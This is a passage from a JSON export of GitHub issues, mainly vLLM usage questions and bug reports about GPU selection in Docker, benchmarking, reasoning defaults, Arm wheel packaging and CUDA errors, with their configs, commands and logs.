`aiter_shared_expert_fusion`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe have a special case in the `FusedMoE` layer for `aiter_shared_expert_fusion` which creates various if branches scattered across the layer.\n\nWe should factor this out.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28137", "state": "open", "labels": [ "help wanted" ], "created_at": "2025-11-05T15:54:09Z", "updated_at": "2025-12-20T22:00:55Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28132, "title": "[Usage]: How do I assign a specific GPU to a vLLM docker container?", "body": "### Your current environment\n\nstock vllm-openai:v0.11.0 docker image\nrootless Docker v.27.5.1 on Ubuntu 22.04.5 LTS on physical hardware\nNvidia Driver Version: 570.133.20\nCUDA Version: 12.8\nGPUs: 4x H100 (NVLink), numbered 0,1,2,3\n\n### How would you like to use vllm\n\nI want to run inference of [SmolLM3-3B](https://huggingface.co/HuggingFaceTB/SmolLM3-3B). The exact model doesn't matter; this happens with other models as well.\n\nI want to run this model using Docker. This basically works. However, it always picks a different GPU than what I specify in CUDA_VISIBLE_DEVICES. Out of my four GPUs, 0 and 1 are idle. I would like the container to use GPU 0. But no matter what I try, it always decides to run on GPU 1. 
I can verify this using `nvtop`.\n\nThis is my compose file:\n```yaml\nservices:\n vllm-smol:\n container_name: smollm-3b\n image: vllm/vllm-openai:v0.11.0\n volumes:\n - ./smollm-3b/models:/models\n gpus: \"all\"\n environment:\n HF_HOME: \"/models\"\n CUDA_VISIBLE_DEVICES: \"0\"\n command: >\n --model HuggingFaceTB/SmolLM3-3B\n --enable-auto-tool-choice\n --tool-call-parser=hermes\n --gpu-memory-utilization 0.1875\n labels:\n```\nThis way, the vLLM container starts and inferencing runs fine. But it decides to use GPU 1 instead of GPU 0.\n\nI have also tried this, since docker compose will only accept `gpus: \"all\"`:\n```bash\ndocker run -d \\\n --name smollm-3b \\\n -v \"$(pwd)/smollm-3b/models:/models\" \\\n --gpus \"device=0\" \\\n -e HF_HOME=\"/models\" \\\n -e CUDA_VISIBLE_DEVICES=\"0\" \\\n vllm/vllm-openai:v0.11.0 \\\n --model HuggingFaceTB/SmolLM3-3B \\\n --enable-auto-tool-choice \\\n --tool-call-parser=hermes \\\n --gpu-memory-utilization 0.1875\n```\nThis gives me an error during container startup: `RuntimeError: No CUDA GPUs are available`\nOmitting `CUDA_VISIBLE_DEVICES` gives the same error.\n\nAnd finally, there is also this attempt:\n```yaml\nservices:\n vllm-smol:\n container_name: smollm-3b\n image: vllm/vllm-openai:v0.11.0\n volumes:\n - ./smollm-3b/models:/models\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: ['0']\n capabilities: [gpu]\n environment:\n HF_HOME: \"/models\"\n # CUDA_VISIBLE_DEVICES: \"0\"\n command: >\n --model HuggingFaceTB/SmolLM3-3B\n --enable-auto-tool-choice\n --tool-call-parser=hermes\n --gpu-memory-utilization 0.1875\n```\nErrors are, once again, identical with and without `CUDA_VISIBLE_DEVICES`: `RuntimeError: No CUDA GPUs are available`\n\nAm I doing something fundamentally wrong here? All I want is to use a specific GPU (GPU 0 in my case).\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28132", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-05T14:42:17Z", "updated_at": "2025-11-06T14:54:41Z", "comments": 1, "user": "lindner-tj" }, { "repo": "huggingface/lerobot", "number": 2389, "title": "How to resolve the issue that GROOT cannot train properly? 
Below is my training configuration and error log.\n\naccelerate launch \\\n --multi_gpu \\\n --num_processes=2 \\\n $(which lerobot-train) \\\n --output_dir=./outputs/groot_training \\\n --save_checkpoint=true \\\n --batch_size=8 \\\n --steps=200000 \\\n --save_freq=20000 \\\n --log_freq=200 \\\n --policy.type=groot \\\n --policy.push_to_hub=false \\\n --policy.repo_id=your_repo_id \\\n --dataset.root=/home/ruijia/wxl/data/train_segdata_wrist_20251028_200/ \\\n --dataset.repo_id=ur_wrist_data \\\n --wandb.enable=false \\\n --wandb.disable_artifact=false \\\n --job_name=grapdata\n\n\n\n[rank1]:[W1105 18:09:16.255729052 CUDAGuardImpl.h:119] Warning: CUDA warning: an illegal memory access was encountered (function destroyEvent)\nterminate called after throwing an instance of 'c10::Error'\n[rank1]:[E1105 18:09:16.257152106 ProcessGroupNCCL.cpp:1899] [PG ID 0 PG GUID 0(default_pg) Rank 1] Process group watchdog thread terminated with exception: CUDA error: an illegal memory access was encountered\nCUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.\nFor debugging consider passing CUDA_LAUNCH_BLOCKING=1\nCompile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.\n\nException raised from c10_cuda_check_implementation at /pytorch/c10/cuda/CUDAException.cpp:43 (most recent call first):\nframe #0: c10::Error::Error(c10::SourceLocation, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) + 0x98 (0x7c3dcab785e8 in /home/ruijia/miniconda3/envs/lerobot_pi05/lib/python3.10/site-packages/torch/lib/libc10.so)", "url": "https://github.com/huggingface/lerobot/issues/2389", "state": "open", "labels": [ "training" ], "created_at": "2025-11-05T10:17:59Z", "updated_at": "2025-11-07T17:47:50Z", "user": "wuxiaolianggit" }, { "repo": "huggingface/lerobot", "number": 2388, "title": "how to improve the generalization of the vla model like gr00t", "body": "After fine-tuning GR00T, I found that it only works for the prompts within the dataset; it is difficult for it to understand new words and new items that need to be grasped. \nIs there a method to preserve generalization? For example, can I create a new layer to map the output of the model to a new dimensionality?", "url": "https://github.com/huggingface/lerobot/issues/2388", "state": "open", "labels": [], "created_at": "2025-11-05T10:06:11Z", "updated_at": "2025-11-05T10:44:38Z", "user": "Temmp1e" }, { "repo": "vllm-project/vllm", "number": 28119, "title": "[Feature]: Will we support async scheduler for pipeline parallel?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSGLang already has https://github.com/sgl-project/sglang/pull/11852\n\nAnd I see a huge perf gap on SM120 PP because of this.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28119", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-05T09:55:57Z", "updated_at": "2025-11-07T06:14:19Z", "comments": 4, "user": "weireweire" }, { "repo": "huggingface/gsplat.js", "number": 122, "title": "I want to add an object (such as a robot) to move around in the model. 
How can this be achieved?", "body": "I want to add an object (such as a robot) to move around in the model. How can this be achieved?", "url": "https://github.com/huggingface/gsplat.js/issues/122", "state": "open", "labels": [], "created_at": "2025-11-05T09:16:39Z", "updated_at": "2025-11-05T09:16:39Z", "user": "ThinkingInGIS" }, { "repo": "vllm-project/vllm", "number": 28104, "title": "[Usage]: vllm bench serve cannot use the sharegpt dataset", "body": "### Your current environment\n\n```text\nI run the following benchmark command: vllm bench serve --model Qwen3 --tokenizer /mnt/workspace/models --host 127.0.0.1 --port 80 --num-prompts 400 --percentile-metrics ttft,tpot,itl,e2el --metric-percentiles 90,95,99 --dataset-name sharegpt --dataset-path /mnt/workspace/benchmarks/sharegpt/ShareGPT_V3_unfiltered_cleaned_split.json --sharegpt-output-len 512\nIt reports the following error: /usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py:61: FutureWarning: The pynvml package is deprecated. Please install nvidia-ml-py instead. If you did not install pynvml directly, please report this to the maintainers of the package that installed pynvml for you.\nimport pynvml # type: ignore[import]\nINFO 11-04 22:14:30 [__init__.py:243] Automatically detected platform cuda.\nINFO 11-04 22:14:32 [__init__.py:31] Available plugins for group vllm.general_plugins:\nINFO 11-04 22:14:32 [__init__.py:33] - lora_filesystem_resolver -> vllm.plugins.lora_resolvers.filesystem_resolver:register_filesystem_resolver\nINFO 11-04 22:14:32 [__init__.py:36] All plugins in this group will be loaded. Set VLLM_PLUGINS to control which plugins to load.\nusage: vllm bench serve [options]\nvllm bench [options] serve: error: argument --dataset-name: invalid choice: 'sharegpt' (choose from random). Why does this command report an error?\n```\n\n\n### How would you like to use vllm\n\nHow can I solve this?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28104", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-05T06:18:02Z", "updated_at": "2025-11-06T14:24:46Z", "comments": 1, "user": "uOnePiece" }, { "repo": "vllm-project/vllm", "number": 28070, "title": "[Usage]: Is there a way to control default thinking behaviour of a model?", "body": "### Your current environment\n\nIs there a way to control the default thinking behaviour for models deployed through vllm?\nAs per https://docs.vllm.ai/en/stable/features/reasoning_outputs.html,\nIBM Granite 3.2 reasoning is disabled by default.\nQwen3, GLM 4.6, Deepseek V3.1 all have reasoning enabled by default.\nIt would be great if there were a way to control this from vllm.\n--override-generation-config allows users to override temperature and other params at deployment.\nBut this does not work for reasoning.\nI have tried\n`docker run -d --runtime nvidia -e TRANSFORMERS_OFFLINE=1 -e DEBUG=\"true\" -p 8000:8000 --ipc=host vllm/vllm-openai:v0.11.0 --reasoning-parser qwen3 --model Qwen/Qwen3-4B --override-generation-config '{\"chat_template_kwargs\": {\"enable_thinking\": false}}'`\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28070", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-04T22:03:32Z", "updated_at": "2025-12-30T03:38:48Z", "comments": 0, "user": "yz342" }, { "repo": "vllm-project/vllm", "number": 28056, "title": "[Bug]: Missing libarm_compute.so in Arm CPU pip installed wheels", "body": "### Your current environment\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWe now have vllm wheels for Arm CPUs in pypi thanks to https://github.com/vllm-project/vllm/pull/26931 and https://github.com/vllm-project/vllm/pull/27331\n\nYou can install Arm CPU wheels with:\n```\npip install --pre vllm==0.11.1rc3+cpu --extra-index-url https://wheels.vllm.ai/0.11.1rc3%2Bcpu/\n```\n\nHowever it will currently fail, unless you ldpreload ACL: \n```\nWARNING 10-29 12:33:18 [interface.py:171] Failed to import from vllm._C: ImportError('libarm_compute.so: cannot open shared object file: No such file or directory')\nWe need to figure out how to package libarm_compute.so in the wheel\n ```\n\nBest way to reproduce this locally is: \n- build vllm from main locally with `VLLM_TARGET_DEVICE=cpu python3 setup.py bdist_wheel`\n- remove `vllm/deps` which contains the libarm_compute.so\n- pip install the wheel you built\n\nthen you will run into the issue (because it will try to load libarm_compute.so under vllm/.deps/arm_compute-src/build/)\n\nNote: ACL/oneDNN are built in vllm here: \n\nWe need to figure out how to bundle `libarm_compute.so` in the wheel to avoid this.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28056", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-04T17:22:55Z", "updated_at": "2025-11-13T05:43:10Z", "comments": 2, "user": "fadara01" }, { "repo": "vllm-project/vllm", "number": 28046, "title": "Qwen3-Omni model inference : ValueError: Either SamplingParams or PoolingParams must be provided.", "body": "### Your current environment\n\n```text\nThe output of `python web_demo.py`\n```\n\nThe above mentioned method provides the error below \n```\n\nqwen/Qwen3-Omni/collect_env.py\", line 287, in get_vllm_version\n from vllm import __version__, __version_tuple__\nImportError: cannot import name '__version__' from 'vllm' (unknown location)\n```\nwhile the envs installed are below:\n\n```\n\n pip list\nPackage Version Editable project location\n--------------------------------- --------------------------------- ----------------------------------------------------------\naccelerate 1.11.0\naiofiles 24.1.0\naiohappyeyeballs 2.6.1\naiohttp 3.13.2\naiosignal 1.4.0\nairportsdata 20250909\nannotated-doc 0.0.3\nannotated-types 0.7.0\nanyio 4.11.0\nastor 0.8.1\nasync-timeout 5.0.1\nattrs 25.4.0\naudioread 3.1.0\nav 16.0.1\nblake3 1.0.8\nBrotli 1.1.0\ncachetools 6.2.1\ncertifi 2025.10.5\ncffi 2.0.0\ncharset-normalizer 3.4.4\nclick 8.2.1\ncloudpickle 3.1.2\ncmake 4.1.2\ncompressed-tensors 0.10.2\ncupy-cuda12x 13.6.0\ndecorator 5.2.1\ndepyf 0.18.0\ndill 0.4.0\ndiskcache 5.6.3\ndistro 1.9.0\ndnspython 2.8.0\neinops 0.8.1\nemail-validator 2.3.0\nexceptiongroup 1.3.0\nfastapi 0.121.0\nfastapi-cli 0.0.14\nfastapi-cloud-cli 0.3.1\nfastrlock 0.8.3\nffmpy 0.6.4\nfilelock 3.20.0\nflash_attn 2.8.3\nfrozenlist 1.8.0\nfsspec 2025.10.0\ngguf 0.17.1\ngradio 5.44.1\ngradio_client 1.12.1\ngroovy 0.1.2\nh11 0.16.0\nhf-xet 1.2.0\nhttpcore 1.0.9\nhttptools 0.7.1\nhttpx 0.28.1\nhuggingface-hub 0.36.0\nidna 3.11\ninteregular 0.3.3\nJinja2 3.1.6\njiter 0.11.1\njoblib 1.5.2\njsonschema 4.25.1\njsonschema-specifications 2025.9.1\nlark 1.2.2\nlazy_loader 0.4\nlibrosa 0.11.0\nllguidance 0.7.30\nllvmlite 0.44.0\nlm-format-enforcer 0.10.12\nmarkdown-it-py 4.0.0\nMarkupSafe 
3.0.3\nmdurl 0.1.2\nmistral_common 1.8.5\nmpmath 1.3.0\nmsgpack 1.1.2\nmsgspec 0.19.0\nmultidict 6.7.0\nnest-asyncio 1.6.0\nnetworkx 3.4.2\nninja 1.13.0\nnumba 0.61.2\nnumpy 2.2.6\nnvidia-cublas-cu12 12.6.4.1\nnvidia-cuda-cupti-cu12 12.6.80\nnvidia-cuda-nvrtc-cu12 12.6.77\nnvidia-cuda-runtime-cu12 12.6.77\nnvidia-cudnn-cu12 9.5.1.17\nnvidia-cufft-cu12 11.3.0.4\nnvidia-cufile-cu12 1.11.1.6\nnvidia-curand-cu12 10.3.7.77\nnvidia-cusolver-cu12 11.7.1.2\nnvidia-cusparse-cu12 12.5.4.2\nnvidia-cusparselt-cu12 0.6.3\nnvidia-nccl-cu12 2.26.2\nnvidia-nvjitlink-cu12 12.6.85\nnvidia-nvtx-cu12 12.6.77\nopenai 1.90.0\nopencv-python-headless 4.12.0.88\norjson 3.11.4\noutlines 0.1.11\noutlines_core 0.1.26\npackaging 25.0\npandas 2.3.3\npartial-json-parser 0.2.1.1.post6\npillow 11.3.0\npip 25.2\nplatformdirs 4.5.0\npooch 1.8.2\nprometheus_client 0.23.1\nprometheus-fastapi-instrumentator 7.1.0\npropcache ", "url": "https://github.com/vllm-project/vllm/issues/28046", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-04T13:59:57Z", "updated_at": "2025-11-24T19:24:39Z", "comments": 22, "user": "Tortoise17" }, { "repo": "vllm-project/vllm", "number": 28045, "title": "[Doc]: Any detailed documentation about how to load_weights in customized vllm model?", "body": "### \ud83d\udcda The doc issue\n\nI don't know how to modify the attention and how the load_model works.\n\nThe documentation says too few, I find it's hard to understand.\n\nAnyone has some more detailed experience? Thank you!\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28045", "state": "open", "labels": [ "documentation" ], "created_at": "2025-11-04T13:23:25Z", "updated_at": "2025-11-05T02:07:55Z", "comments": 0, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 28035, "title": "[Usage]: deepseek-ocr The output token count is too low and unstable.", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\npython3 -m vllm.entrypoints.openai.api_server --served-model-name deepseek-ocr --model deepseekocr --tensor-parallel-size 1 --gpu-memory-utilization 0.95 --disable-log-requests --logits_processors vllm.model_executor.models.deepseek_ocr:NGramPerReqLogitsProcessor\n\n {\n \"model\": \"DeepSeek-OCR\",\n \"messages\": [{\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"image_url\",\n \"image_url\": {\"url\": f\"data:image/jpeg;base64,{self.image_to_base64(image_path)}\"}\n },\n {\"type\": \"text\", \"text\": \u201d\\nFree OCR.\u201c}\n ]\n }],\n \"vllm_xargs\": {\n \"ngram_size\": 30,\n \"window_size\": 100,\n \"whitelist_token_ids\": \"[128821, 128822]\"\n },\n \"temperature\": 0.0,\n \"max_tokens\": 4096\n }\n\n\n\"finish_reason\":\"stop\" but \"completion_tokens\":200+ \uff0ccannot output the complete image content.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28035", "state": "open", "labels": [ "usage" ], 
"created_at": "2025-11-04T09:50:53Z", "updated_at": "2025-11-04T09:50:53Z", "comments": 0, "user": "sixgod-666" }, { "repo": "vllm-project/vllm", "number": 28031, "title": "[Usage]: Error: Failed to initialize the TMA descriptor 700", "body": "### Your current environment\n\nvllm0.11.0 to train Qwen3-vl-8B \n\nThe following error message appears intermittently during training.\n```\n[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa9bdcd0000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,415,2,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,2048,1024,0,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa46a000000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa48819e000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa46a000000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict 
pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa48819e000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m CUDA error (/workspace/.deps/vllm-flash-attn-src/hopper/flash_fwd_launch_template.h:191): an illegal memory access was encountered\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n```\n\n\nthen the error message below is being repeated, but training has not stopped.\n\n```\n[36m(WorkerDict pid=134586)\u001b[0m [rank7]:[W1104 07:52:01.751088784 TCPStore.cpp:125] [c10d] recvValue failed on SocketImpl(fd=90, addr=[train-kubeflow-72-46805-20251104102107-master-0]:49384, remote=[train-kubeflow-72-46805-20251104102107-master-0]:32991): Connection reset by peer\u001b[32m [repeated 6x across cluster]\u001b[0m\n\u001b[36m(WorkerDict pid=134586)\u001b[0m Exception raised from recvBytes at /pytorch/torch/csrc/distributed/c10d/Utils.hpp:679 (most recent call first):\u001b[32m [repeated 6x across cluster]\u001b[0m\n\u001b[36m(WorkerDict pid=134580)\u001b[0m frame #0: c10::Error::Error(c10::SourceLocation, std::__cxx11::ba", "url": "https://github.com/vllm-project/vllm/issues/28031", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-04T08:13:45Z", "updated_at": "2025-12-11T08:18:15Z", "comments": 4, "user": "DBMing" }, { "repo": "vllm-project/vllm", "number": 28016, "title": "[Usage]: How to recognize PDFs in DeepSeek-OCR with openai", "body": "### Your current environment\n```\nvllm serve deepseek-ai/DeepSeek-OCR --logits_processors vllm.model_executor.models.deepseek_ocr.NGramPerReqLogitsProcessor --no-enable-prefix-caching --mm-processor-cache-gb 0\n```\n\n\n\n### How would you like to use vllm\n\nHow to recognize PDFs and convert PDFs to Markdown with DeepSeek-OCR via an OpenAI-compatible API?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28016", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-04T03:35:38Z", "updated_at": "2025-11-04T07:33:07Z", "comments": 2, "user": "shoted" }, { "repo": "vllm-project/vllm", "number": 28003, "title": "[Usage]:", "body": "### Your current environment\n\n```text\nCollecting environment 
information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-54-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 570.86.10\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 48\nOn-line CPU(s) list: 0-47\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9654 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 1\nSocket(s): 48\nStepping: 1\nBogoMIPS: 4799.59\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw perfctr_core ssbd ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx512_bf16 clzero xsaveerptr wbnoinvd arat npt lbrv nrip_save tsc_scale vmcb_clean flushbyasid pausefilter pfthreshold v_vmsave_vmload vgif vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid fsrm flush_l1d arch_capabilities\nVirtualization: AMD-V\nL1d cache: 3 MiB (48 instances)\nL1i cache: 3 MiB (48 instances)\nL2 cache: 24 MiB (48 instances)\nL3 cache: 768 MiB (48 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-47\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant 
